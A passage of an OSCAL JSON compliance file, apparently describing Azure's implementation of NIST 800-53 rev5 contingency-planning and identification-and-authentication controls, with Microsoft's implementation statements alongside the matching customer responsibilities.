logging is a core function of the SQL engine and cannot be disabled. Common practice at Microsoft is replicate the transaction log to multiple assets and replay them to keep hot standby secondary databases on those assets up to date. This mechanism is referred to as Always On. Always On maintains multiple copies of a single database that reside on different server instances in different locations. One server instance serves the database to clients (the primary server). The other instance acts as a hot or warm standby server. In the event of a disaster, a failover quickly brings the standby copy of the database online (without data loss). For an Overview of SQL Server Always On, please refer to <https://msdn.microsoft.com/en-us/library/ff877884.aspx.> Therefore, this is an alternative to transaction journaling because it provides the means to provide support for contingency events. Also, per Microsoft \"10.01 Business Continuity Management Standard\", transaction recovery plans are required and managed by the different business groups to ensure the continuation of business processes in the event of an interruption._x000D_ _x000D_"}],"responsibilities":[{"uuid":"55f64258-6f47-4918-9087-d016d3a79496","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-058"}],"description":"The customer is responsible for implementing transaction-based (e.g., transaction rollback, transaction journaling) recovery within customer-deployed resources. Note: if the customer configures Microsoft Azure backup and/or alternate site processing services appropriately, Azure can support the continued operation of customer-deployed resources.","provided-uuid":"eb27c1db-5bac-412d-a84c-58731e4c8758"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"a1c0ed6e-dcaa-4952-a59a-17229e7246a1","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"cp-10.4","statements":[{"uuid":"9ed83edf-4f5d-43b6-aaf2-772f6e5dccba","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-059"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cp-10.4_smt","by-components":[{"uuid":"552aa605-ba43-4a05-91e8-10d5cf021164","export":{"provided":[{"uuid":"2a39640b-04ae-4be3-af85-d8243ad742d7","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-059"}],"description":"If all datacenters for an Azure service experience failure, or if Microsoft were to resume processing at a disrupted site, Microsoft uses the following to recover Azure services in other Azure datacenters to the last known state:_x000D_ _x000D_ * Defined images and current OS, network device, and application baselines_x000D_ * Defined security processes around access control, change management, mandatory configuration settings, and encryption mechanisms_x000D_ _x000D_ Redeployment as part of system restoration follows the same process with the same authentication requirements as initial deployment as part of configuration management._x000D_ _x000D_ Azure does not establish separate recovery times for individual datacenter components due to the design and function of datacenters. Azure datacenters are designed to be redundant by hosting services in datacenters that are geographically separated from each other. Services are mirrored in geographically redundant datacenters; all sites are active. Therefore, the risk to the security of the Azure environment due to failure of individual components is mitigated through availability of the information system._x000D_ _x000D_ If necessary to support the resumption of a service according to established disaster recovery plans, individual system components are replaced in support of the service Recovery Time Objective (RTO). The Azure spares policy ensures that spare components are available if replacement is needed._x000D_ _x000D_"}],"responsibilities":[{"uuid":"5e65fe83-c2d8-467e-ae8e-5e73ef0da47a","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-059"}],"description":"The customer is responsible for restoring customer-deployed resources to a configuration-controlled and integrity-protected known, operational state. Azure can support the continued operation of customer-deployed resources if the customer configures Microsoft Azure backup and/or alternate site processing services appropriately,.","provided-uuid":"2a39640b-04ae-4be3-af85-d8243ad742d7"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"59ac938c-928a-46f0-91af-72351d69b256","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"ia-2","statements":[{"uuid":"cf52a1c3-a1c6-4889-ae3a-b86d69348644","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-006"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ia-2_smt","by-components":[{"uuid":"8290a5ea-d78d-4243-8362-2e16ca0ed835","export":{"provided":[{"uuid":"110dd138-933d-4630-ac36-c1337f3b26e4","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-006"}],"description":"Azure uniquely identifies and authenticates users via Active Directory (AD) and smart cards. AD associates users to IDs and GUIDs and prevents the creation of a duplicate account. A user's account within each Azure domain maps his or her Microsoft corporate network (CorpNet) identifier, known as an alias, to the Azure domain for identification and authentication._x000D_ _x000D_ Azure utilizes the Global Management Environment (GME) and Azure Management Environment (AME) domains for access to the Azure environment. Each domain is specific to the environment._x000D_ _x000D_ As an example, John Doe's alias is jdoe, with accounts jdoe@redmond.gbl for access to CorpNet and jdoe@ame.gbl for access to Azure Commercial._x000D_ _x000D_ Jumpboxes, Debug servers, Network Hop Boxes, and the SSL VPN are the approved mechanisms by which to gain access to Azure assets via internal network connectivity from CorpNet. A user authenticates to the Jumpbox, Debug server, Network Hop Box, or the SSL VPN with his or her smart card and PIN, then authenticates to the destination asset, with an approved JIT request necessary for elevated access._x000D_ _x000D_"}],"responsibilities":[{"uuid":"f82bc03b-3958-4c50-8e23-132c6b11c9e0","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-006"}],"description":"The customer is responsible for uniquely identifying and authenticating organizational users. Federal user entities are responsible for properly identifying and authenticating federal users via ADFS.","provided-uuid":"110dd138-933d-4630-ac36-c1337f3b26e4"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"7185cde1-29a6-40b6-9643-8ce143432cb4","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"ia-2.1","statements":[{"uuid":"371e4804-9e7b-4022-a772-544ea2f871aa","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-007"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ia-2.1_smt","by-components":[{"uuid":"66629711-d15d-419c-a887-23d908527816","export":{"provided":[{"uuid":"8c0b88fe-7eea-453d-94b3-5437e6aae893","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-007"}],"description":"Azure implements multifactor authentication through the use of smart card and PIN logons at entry points to the production assets._x000D_ _x000D_"}],"responsibilities":[{"uuid":"f394bdb9-1e6a-4d72-a51e-fb5410fff9f8","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-007"}],"description":"The customer is responsible for implementing multifactor authentication for network access to privileged accounts.","provided-uuid":"8c0b88fe-7eea-453d-94b3-5437e6aae893"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"002c12b4-2b1e-4ab0-a53c-f700f4f10067","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"ia-2.2","statements":[{"uuid":"75a52acd-dd04-4ca7-91cc-fbabedffe878","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-008"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ia-2.2_smt","by-components":[{"uuid":"832706ef-209f-4ee7-8e14-ffbec9c01dc3","export":{"provided":[{"uuid":"3c749d25-7eb8-4600-9abe-ee685ee0b9d6","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-008"}],"description":"Azure implements multifactor authentication through the use of smart card and PIN logons at entry points to the production assets._x000D_ _x000D_"}],"responsibilities":[{"uuid":"30aa2236-96ca-4cd3-8966-d7524bf6b909","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-008"}],"description":"The customer is responsible for implementing multifactor authentication for network access to non-privileged accounts.","provided-uuid":"3c749d25-7eb8-4600-9abe-ee685ee0b9d6"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"e2773a8a-85e8-4718-95ad-3f2cc5cd2d8c","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"ia-2.5","statements":[{"uuid":"78a4556f-3eee-487c-821f-e065e170f54e","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-009"},{"name":"control-origination","value":"customer-provided"}],"statement-id":"ia-2.5_smt","by-components":[{"uuid":"fd0b4144-b287-4635-988c-c5d3b19eb4f4","export":{"provided":[{"uuid":"44e2ca47-cc56-45d9-b4ec-80b9ac4dc115","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-009"}],"description":"Group or shared accounts are not utilized within Azure unless necessary, such as where the local account or accounts cannot be deleted or disabled, or is necessary for emergency access. For accounts tracked as approved exceptions, the credentials for these accounts are stored in an approved secret management store, which tracks and monitors access to secrets and ensures group or shared account usage is uniquely attributable to the user accessing it by associated the secret store logs with the group or shared account usage. When a user accesses the credentials in the secret management store, that user is identified uniquely, ensuring non-repudiation and attributing user activity to the shared account._x000D_ _x000D_"}],"responsibilities":[{"uuid":"eb271d32-2f07-45b2-b55b-0451fac40073","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-009"}],"description":"The customer is responsible for requiring individuals using group authenticators to first authenticate using individual authenticators.","provided-uuid":"44e2ca47-cc56-45d9-b4ec-80b9ac4dc115"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"f7fc4c52-a50d-4d02-aedc-4e9b866f13c3","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"ia-2.6","statements":[{"uuid":"ef5e88f1-befc-4c39-a7bf-27c0556c7c2b","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-010"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ia-2.6_smt","by-components":[{"uuid":"109501f6-225d-4ac0-8145-a8b5fc2ee5e9","export":{"provided":[{"uuid":"fb87be54-2df2-4bb4-b298-5abbb214449a","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-010"}],"description":"Azure implements multifactor authentication for access to privileged and non-privileged accounts through the use of Thales and Idemia smart cards and Yubico Yubikeys. Access requires the user to present a certificate bound to the card or key along with a PIN."}],"responsibilities":[{"uuid":"ea848790-0328-4f5a-9cbd-1c77049cc39b","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-010"}],"description":"The customer is responsible for implementing multifactor authentication for access to accounts such that one of the factors is provided by a device separate from the system gaining access and the device meets defined strength of mechanism requirements.","provided-uuid":"fb87be54-2df2-4bb4-b298-5abbb214449a"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"6aad4cf5-b64a-438c-8550-e20624efdd03","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"ia-2.8","statements":[{"uuid":"2c4e64e8-c63e-4d14-81a3-21f0d590e21f","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-011"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ia-2.8_smt","by-components":[{"uuid":"e500a390-3847-4a58-9830-8972a1244a35","export":{"provided":[{"uuid":"29d93637-f798-4709-b700-65b22f55d8b8","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-011"}],"description":"Azure implements multifactor authentication for network access by Azure personnel with eAuth Level 4 and FIPS 140-2 compliant Thales smart cards. All Microsoft users connect to Azure assets via Jumpboxes, Debug servers, and Network Hop Boxes. This requires the user to present a certificate bound to the card along with a PIN._x000D_ _x000D_ Access to the Azure production environment using the smart card solution is protected from replay attacks by the built-in Kerberos v5 functionality of Active Directory (AD). In Kerberos authentication, the authenticator sent by the client contains additional data, such as an encrypted IP list, the client's timestamp, and the ticket lifetime. If a packet is replayed, the timestamp is checked. If the timestamp is earlier than or the same as a previous authenticator, the packet is rejected because it is a replay._x000D_ _x000D_ For more information on Active Directory and Kerberos, see TechNet article 742516: <https://technet.microsoft.com/en-us/library/bb742516.aspx>_x000D_ _x000D_ Techniques used to address replay attacks from network connections to the Azure environment include the use of the TLS protocol that uses challenges. The TLS protocol is used to authenticate network access to prove the identities of parties engaged in secure communication. It also provides data integrity through an integrity check value. In addition to protecting against data disclosure, the TLS security protocol can be used to help protect against masquerade attacks, man-in-the-middle or bucket brigade attacks, rollback attacks, and replay attacks._x000D_ _x000D_"}],"responsibilities":[{"uuid":"5f46f83d-5858-4527-9551-4b1d50ca649e","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-011"}],"description":"The customer is responsible for implementing replay-resistant authentication mechanisms for network access to privileged accounts.","provided-uuid":"29d93637-f798-4709-b700-65b22f55d8b8"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"4eb8b169-8985-4c24-8820-f4a9d0966dc1","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"ia-2.12","statements":[{"uuid":"d94f3aa3-1b9e-4aa6-afeb-afa02a64501c","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-012"},{"name":"control-origination","value":"customer-provided"}],"statement-id":"ia-2.12_smt","by-components":[{"uuid":"9d0795c7-382b-45f3-82bc-0093eb743684","export":{"provided":[{"uuid":"a3b211e2-3173-42ca-9af7-fdf73aa2cfc0","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-012"}],"description":"Azure does not utilize Personal Identity Verification (PIV) credentials for internal personnel because PIV cards are not available to Azure._x000D_ _x000D_"}],"responsibilities":[{"uuid":"67abee64-6d32-4e7a-8f68-48f76732f9ed","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-012"}],"description":"Government customers using ADFS are responsible for accepting and electronically verifying Personal Identity Verification (PIV) credentials for government customer users.","provided-uuid":"a3b211e2-3173-42ca-9af7-fdf73aa2cfc0"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"3625b445-dc50-4a00-8499-93e0073ac9c1","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"ia-3","statements":[{"uuid":"9240d004-930e-459b-afa9-9957bbcc483c","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-013"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ia-3_smt","by-components":[{"uuid":"7e4d836e-6aa8-4ce4-bfd1-0562f25dd645","export":{"provided":[{"uuid":"3f0068fe-6462-4126-91cc-6cfc1162baf9","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-013"}],"description":"Azure identifies and authenticates network devices and servers, both physical and virtual._x000D_ _x000D_ Servers_x000D_ _x000D_ All Azure physical server name resolution is performed through DNS addresses. Subnets used for the physical server environment use IP addresses provisioned from RFC 1918 non-publicly routable address space. Physical servers are identified and tracked using Datacenter Manager (DCM)._x000D_ _x000D_ When establishing an Azure subscription, a subscription ID is created. The Fabric Controller (FC), which manages all VMs in Azure, uses this subscription ID to tie VMs to specific subscriptions._x000D_ _x000D_ Devices on the Azure environment authenticate with unique identifiers in the form of static MAC addresses and certificates. A physical asset or VM obtains an IP address over the network when it initially boots-up. The Fabric DHCP Server is responsible for assigning IP addresses to physical assets and VMs as determined by the Fabric Controller. This allows the Fabric Controller to take control of managing the IP address pools for the set of physical assets. IPFilter on the operating system (RDOS) is programmed via the Fabric to only allow traffic from specific MAC addresses and specific DIPs, to counter ARP spoofing._x000D_ _x000D_ Network Devices_x000D_ _x000D_ As part of the network discovery and configuration steps in the bootstrap workflow, network devices are pre-configured to use DHCP/PXE boot for their configuration. Upon boot of the network device, the bootstrap agent provides the OS image for the device and the basic configuration, including the IP address and credentials, before establishing the connection to the environment._x000D_ _x000D_"}],"responsibilities":[{"uuid":"e00ec96e-cdcc-4fbe-a5e4-1faf52709fb5","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-013"}],"description":"The customer is responsible for implementing device identification and authentication prior to establishing a connection.","provided-uuid":"3f0068fe-6462-4126-91cc-6cfc1162baf9"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"0a94bc5e-2873-42ea-8210-65c2037e01d1","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"ia-4","statements":[{"uuid":"8f6bb818-de4e-4e54-a0f5-0802bd7a087b","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-014"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ia-4_smt.a","by-components":[{"uuid":"d254dfd7-6d1d-4dd6-bfe3-066b3c48fb9c","export":{"provided":[{"uuid":"b0b52f4d-093a-4413-ba84-9e1730c7b08e","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-014"}],"description":"Microsoft implements the identifier management control through the effective use of the corporate network (CorpNet) AD-based user authorization procedures. Microsoft establishes unique identifiers for each user through unique user IDs, based on HR personnel ID numbers. These CorpNet identifiers, known as aliases, are distributed to all Microsoft personnel during the initial CorpNet account creation process._x000D_ _x000D_ For personnel supporting Azure services, a user account within each Azure domain ties to the user's CorpNet account using his or her unique CorpNet alias. This alias is consistent across all a user's accounts in all Microsoft domains, including Azure. CorpNet and Azure access are provisioned and managed using separate account management tools. Azure utilizes OneIdentity for both identifier and security group management._x000D_ _x000D_ _x000D_ _x000D_ Azure utilizes the Global Management Environment (GME) and Azure Management Environment (AME) domains for access to the Azure environment. Each domain is specific to the environment._x000D_ _x000D_ As an example, John Doe's alias is jdoe, with accounts jdoe@redmond.gbl for access to CorpNet and jdoe@ame.gbl for access to Azure Commercial._x000D_ _x000D_ Device identifiers are authorized by service team users when adding new devices to the network, consistent with configuration management and inventory management procedures._x000D_ _x000D_"}],"responsibilities":[{"uuid":"5f568855-948c-43f9-9bb8-4facef586509","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-014"}],"description":"The customer is responsible for managing identifiers (i.e., individuals, groups, roles, and devices) for customer resources by receiving authorization from customer-defined personnel/roles prior to assigning identifiers. **Customer Identity Federation** Agency customers create their user accounts via the Microsoft Azure Management Portal. The portal is the entry point for all Microsoft Azure subscribers. Accounts are automatically created when the service is subscribed. Microsoft Azure Management Portal user identifiers are defined by the customer. The customer agency is responsible for obtaining authorization from agency organizational officials for access by agency users and ensuring the correct identifier is assigned to the correct agency employee for access to Microsoft Azure via the Microsoft Azure Management Portal and agency enablers.","provided-uuid":"b0b52f4d-093a-4413-ba84-9e1730c7b08e"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"c929a1f2-9255-4074-b7c0-7861fc8b76e9","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-015"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ia-4_smt.b","by-components":[{"uuid":"f6fe4e77-80c4-44b5-b695-53caca76e566","export":{"provided":[{"uuid":"3a88fa34-237d-4c90-949c-534544351413","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-015"}],"description":"Azure identifies users using the account identifier derived from their Microsoft CorpNet alias as described above. These unique identifiers are not reused for two (2) years._x000D_ _x000D_ Device identifiers are selected by service team users when adding new devices to the network, consistent with configuration management and inventory management procedures._x000D_ _x000D_ Active Directory is the central account repository used to provide access._x000D_ _x000D_"}],"responsibilities":[{"uuid":"3d715cdf-df6c-45f8-bbd0-584a6ab57058","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-015"}],"description":"The customer is responsible for selecting identifiers (i.e., individuals, groups, roles, and devices) for customer resources. **Customer Identity Federation** Federal user entities, as well as other customers using identity federation, are responsible for selecting and assigning federal/customer user identifiers through their Active Directory management structure which carries over to AAD through the ADFS Federation. These authentication requests include a claims-based response with group access allowing the unique user to be mapped to the directory synchronized copy of the user in AAD.","provided-uuid":"3a88fa34-237d-4c90-949c-534544351413"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"ca278114-5062-40b9-b9f3-4bc783f1735f","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-016"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ia-4_smt.c","by-components":[{"uuid":"27ec591c-3e5f-42eb-bbac-2d5205f3b37c","export":{"provided":[{"uuid":"da5caf93-aadf-4b66-ba7d-949d7d28d583","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-016"}],"description":"Active Directory (AD) is the central account repository used to provide access to the service environment._x000D_ _x000D_ The Human Resource database is the authoritative source for determining employment status for these AD accounts, as well as establishing the account display name or alias. When the account is created in AD, the unique identifier is created and assigned to the individual._x000D_ _x000D_ When adding new devices to the network, service team users assign device identifiers consistent with configuration management and inventory management procedures._x000D_ _x000D_"}],"responsibilities":[{"uuid":"3099fc93-ace8-490b-935e-a2ae38ed0755","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-016"}],"description":"The customer is responsible for assigning identifiers (i.e., individuals, groups, roles, and devices) for customer resources. **Customer Identity Federation** Federal user entities, as well as other customers using identity federation, are responsible for selecting and assigning federal/customer user identifiers through their Active Directory management structure which carries over to AAD through the ADFS Federation. These authentication requests include a claims-based response with group access allowing the unique user to be mapped to the directory synchronized copy of the user in AAD.","provided-uuid":"da5caf93-aadf-4b66-ba7d-949d7d28d583"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"52925ff1-c57c-41b7-a9a4-f1af55256332","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-017"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ia-4_smt.d","by-components":[{"uuid":"46867fce-5918-46bd-a9ee-27fde821c01c","export":{"provided":[{"uuid":"a3913294-92db-47e1-a7ac-48db9b439393","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-017"}],"description":"Unique user and service or device identifiers are not reused for two (2) years. This is enforced by Active Directory (AD). For users, smart cards are device-unique token identifiers which are uniquely paired to individuals. Smart card certificates are paired to an individual's AD Security Identifier (SID). These unique account identifier and device pairs are not reused._x000D_ _x000D_"}],"responsibilities":[{"uuid":"721c72b8-39c5-4b7b-b893-d19f3bcc9053","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-017"}],"description":"The customer is responsible for preventing identifier reuse for the customer-defined time period.","provided-uuid":"a3913294-92db-47e1-a7ac-48db9b439393"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"942278eb-8063-410d-9a4d-04ae8fb726c7","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"ia-4.4","statements":[{"uuid":"f6f8980d-870a-47ec-8e2f-5ce8376e7a35","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-018"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ia-4.4_smt","by-components":[{"uuid":"9ce13240-2670-4203-92a1-ba070d2614ab","export":{"provided":[{"uuid":"f1321cb6-8af2-40a5-8553-e6b7c72cab4c","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-018"}],"description":"The status of all Microsoft personnel is recorded in OneIdentity, which is the authoritative system for controlling and authorizing account permissions within Azure. Additionally, contractors and vendors are denoted by a prefix, \"a-\" or \"v-\", respectively, associated with their unique AD credentials. Foreign nationals are not uniquely identified in this system as it is a multi-tenant system supporting commercial clients as well as government agencies. Microsoft maintains an operational requirement for this implementation._x000D_ _x000D_"}],"responsibilities":[{"uuid":"7e31991a-3542-4819-940a-314eb3297064","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-018"}],"description":"The customer is responsible for identifying the status (e.g., contractor, foreign national) of individual users with unique identifiers.","provided-uuid":"f1321cb6-8af2-40a5-8553-e6b7c72cab4c"}]},"description":"See inheritance and customer responsibility 